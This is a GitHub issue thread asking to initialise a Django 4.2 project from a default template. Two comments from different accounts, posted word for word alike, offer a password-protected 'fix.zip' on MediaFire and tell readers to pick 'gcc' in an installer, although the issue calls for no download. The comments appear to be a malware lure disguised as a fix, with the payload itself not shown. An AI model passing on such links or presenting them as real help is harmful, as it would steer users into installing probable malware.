### ISSUE TITLE
Initialise Django Project

### ISSUE THREAD

**Issue by mageshravi** [Webinative/keyframes#4]
Initialise a project with Django 4.2 using Webinative's default project template.

**Comment by luozhengdong** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by 2302114245** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
